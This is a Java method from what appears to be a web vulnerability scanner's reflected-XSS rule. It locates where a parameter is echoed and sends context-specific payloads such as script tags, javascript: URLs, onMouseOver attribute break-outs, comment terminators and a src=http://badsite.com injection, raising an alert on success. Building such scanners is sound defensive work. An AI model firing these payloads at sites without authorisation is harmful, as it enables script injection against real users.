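/**
 * Active-scan entry point for a single request parameter.
 *
 * <p>Phase one injects the benign eye-catcher string and asks
 * {@code HtmlContextAnalyser} where it is reflected; phase two sends one
 * context-specific probe per reflection point. The first probe that
 * {@code performAttack} reports as landing in an executable context raises
 * an alert through {@code bingo} and ends the scan of this parameter.
 *
 * <p>Fixes relative to the earlier version of this method: the "append to the
 * original value" fallback injected {@code param + eyecatcher} but searched
 * the response for {@code value + eyecatcher}, so it could never match; and
 * two alerts raised inside a loop reported {@code contexts2.get(0)} instead
 * of the context that actually satisfied the loop condition.
 *
 * @param msg   the request under test; modified in place by
 *              {@code setParameter} and {@code sendAndReceive}
 * @param param the name of the parameter being tested
 * @param value the parameter's original value, used for the
 *              "append the eye-catcher" fallback
 */
public void scan(HttpMessage msg, String param, String value) {
    try {
        boolean attackWorked = false;

        // Phase 1: locate reflection points with a harmless marker.
        setParameter(msg, param, Constant.getEyeCatcher());
        sendAndReceive(msg);
        HtmlContextAnalyser hca = new HtmlContextAnalyser(msg);
        List<HtmlContext> contexts = hca.getHtmlContexts(Constant.getEyeCatcher(), null, 0);
        if (contexts.isEmpty()) {
            // The application may lower-case the value before echoing it.
            contexts = hca.getHtmlContexts(Constant.getEyeCatcher().toLowerCase(), null, 0);
        }
        if (contexts.isEmpty()) {
            // ...or upper-case it.
            contexts = hca.getHtmlContexts(Constant.getEyeCatcher().toUpperCase(), null, 0);
        }
        if (contexts.isEmpty()) {
            // Some inputs are only echoed when the original value is kept, so
            // append the marker to it. Injected string and searched-for string
            // must be identical, hence 'value' on both lines.
            setParameter(msg, param, value + Constant.getEyeCatcher());
            sendAndReceive(msg);
            hca = new HtmlContextAnalyser(msg);
            contexts = hca.getHtmlContexts(value + Constant.getEyeCatcher(), null, 0);
        }
        if (contexts.isEmpty()) {
            // No reflection context found; fall back to a single context-free probe.
            // Reported with lower confidence (SUSPICIOUS) because nothing is known
            // about where the reflection landed.
            List<HtmlContext> contexts2 = performAttack(msg, param,
                    "'\"<script>alert(1);</script>", null, 0);
            if (!contexts2.isEmpty()) {
                HtmlContext hit = contexts2.get(0);
                bingo(Alert.RISK_HIGH, Alert.SUSPICIOUS, null, param, hit.getTarget(),
                        "", hit.getTarget(), hit.getMsg());
                attackWorked = true;
            }
        }

        // Phase 2: one targeted probe per reflection context, stop at the first hit.
        for (HtmlContext context : contexts) {
            if (attackWorked) {
                break;
            }
            if (context.getTagAttribute() != null) {
                // Reflected inside a tag attribute.
                if (context.isInScriptAttribute()) {
                    // Event-handler attribute: the value is already JavaScript.
                    List<HtmlContext> contexts2 = performAttack(msg, param, ";alert(1)", context, 0);
                    for (HtmlContext context2 : contexts2) {
                        if (context2.getTagAttribute() != null
                                && context2.isInScriptAttribute()) {
                            // Report the context that matched, not contexts2.get(0).
                            raiseXssAlert(param, "", context2);
                            attackWorked = true;
                            break;
                        }
                    }
                    if (!attackWorked) {
                        log.debug("Failed to find vuln in script attribute on " + msg.getRequestHeader().getURI());
                    }
                } else if (context.isInUrlAttribute()) {
                    // href/src style attribute.
                    List<HtmlContext> contexts2 = performAttack(msg, param, "javascript:alert(1);", context, 0);
                    for (HtmlContext ctx : contexts2) {
                        if (ctx.isInUrlAttribute()) {
                            raiseXssAlert(param, "", ctx);
                            attackWorked = true;
                            break;
                        }
                    }
                    if (!attackWorked) {
                        log.debug("Failed to find vuln in url attribute on " + msg.getRequestHeader().getURI());
                    }
                }
                if (!attackWorked && context.isInTagWithSrc()) {
                    // Attribute of a tag that honours a src attribute.
                    List<HtmlContext> contexts2 = performAttack(msg, param,
                            context.getSurroundingQuote() + " src=http://badsite.com", context, HtmlContext.IGNORE_TAG);
                    if (!contexts2.isEmpty()) {
                        raiseXssAlert(param, "", contexts2.get(0));
                        attackWorked = true;
                    }
                    if (!attackWorked) {
                        log.debug("Failed to find vuln in tag with src attribute on " + msg.getRequestHeader().getURI());
                    }
                }
                if (!attackWorked) {
                    // Close the attribute and the tag, then inject a script element.
                    List<HtmlContext> contexts2 = performAttack(msg, param,
                            context.getSurroundingQuote() + "><script>alert(1);</script>", context, HtmlContext.IGNORE_TAG);
                    if (!contexts2.isEmpty()) {
                        raiseXssAlert(param, "", contexts2.get(0));
                        attackWorked = true;
                    }
                    if (!attackWorked) {
                        log.debug("Failed to find vuln with simple script attack " + msg.getRequestHeader().getURI());
                    }
                }
                if (!attackWorked) {
                    // Close the attribute and add an event handler to the same tag.
                    List<HtmlContext> contexts2 = performAttack(msg, param,
                            context.getSurroundingQuote() + " onMouseOver=" + context.getSurroundingQuote() + "alert(1);",
                            context, HtmlContext.IGNORE_TAG);
                    if (!contexts2.isEmpty()) {
                        raiseXssAlert(param, "", contexts2.get(0));
                        attackWorked = true;
                    }
                    if (!attackWorked) {
                        log.debug("Failed to find vuln in with simple onmounseover " + msg.getRequestHeader().getURI());
                    }
                }
            } else if (context.isHtmlComment()) {
                // Reflected inside an HTML comment: try to terminate the comment.
                List<HtmlContext> contexts2 = performAttack(msg, param,
                        "--><script>alert(1);</script><!--", context, HtmlContext.IGNORE_HTML_COMMENT);
                if (!contexts2.isEmpty()) {
                    raiseXssAlert(param, "", contexts2.get(0));
                    attackWorked = true;
                } else {
                    // Script tags may be filtered; retry with an event handler.
                    contexts2 = performAttack(msg, param,
                            "--><b onMouseOver=alert(1);>test</b><!--", context, HtmlContext.IGNORE_HTML_COMMENT);
                    if (!contexts2.isEmpty()) {
                        raiseXssAlert(param, "", contexts2.get(0));
                        attackWorked = true;
                    }
                }
            } else {
                // Reflected as text content, not inside an attribute.
                if ("body".equalsIgnoreCase(context.getParentTag())) {
                    // Directly under <body>: a bare script element is enough.
                    List<HtmlContext> contexts2 = performAttack(msg, param,
                            "<script>alert(1);</script>", null, HtmlContext.IGNORE_PARENT);
                    if (!contexts2.isEmpty()) {
                        raiseXssAlert(param, "", contexts2.get(0));
                        attackWorked = true;
                    } else {
                        // Script tags may be filtered; retry with an event handler.
                        contexts2 = performAttack(msg, param,
                                "<b onMouseOver=alert(1);>test</b>", context, HtmlContext.IGNORE_PARENT);
                        for (HtmlContext context2 : contexts2) {
                            if ("body".equalsIgnoreCase(context2.getParentTag())
                                    || "script".equalsIgnoreCase(context2.getParentTag())) {
                                // Report the context that matched, not contexts2.get(0).
                                raiseXssAlert(param, "TBI Body tag", context2);
                                attackWorked = true;
                                break;
                            }
                        }
                    }
                } else if (context.getParentTag() != null) {
                    // Nested under some other element: close it first.
                    List<HtmlContext> contexts2 = performAttack(msg, param,
                            "</" + context.getParentTag() + "><script>alert(1);</script><" + context.getParentTag() + ">",
                            context, HtmlContext.IGNORE_IN_SCRIPT);
                    if (!contexts2.isEmpty()) {
                        raiseXssAlert(param, "", contexts2.get(0));
                        attackWorked = true;
                    } else if ("script".equalsIgnoreCase(context.getParentTag())) {
                        // Inside a script block: break out of the enclosing string literal.
                        contexts2 = performAttack(msg, param,
                                context.getSurroundingQuote() + ";alert(1);" + context.getSurroundingQuote(), context, 0);
                        if (!contexts2.isEmpty()) {
                            raiseXssAlert(param, "", contexts2.get(0));
                            attackWorked = true;
                        }
                    }
                }
            }
        }
    } catch (InvalidRedirectLocationException ignored) {
        // Expected when the probe ends up in the redirect target; not a scan error.
    } catch (Exception e) {
        // Scan-rule boundary: never let one parameter abort the whole scan.
        log.error(e.getMessage(), e);
    }
}

/**
 * Raises the rule's standard high-risk alert for a probe reflected in an
 * executable context. Attack and evidence are both the reflected target,
 * matching how every alert in this rule is reported.
 *
 * @param param     the parameter the probe was sent in
 * @param otherInfo free-text note for the alert ("" for none)
 * @param ctx       the reflection context returned by {@code performAttack}
 */
private void raiseXssAlert(String param, String otherInfo, HtmlContext ctx) {
    bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, ctx.getTarget(),
            otherInfo, ctx.getTarget(), ctx.getMsg());
}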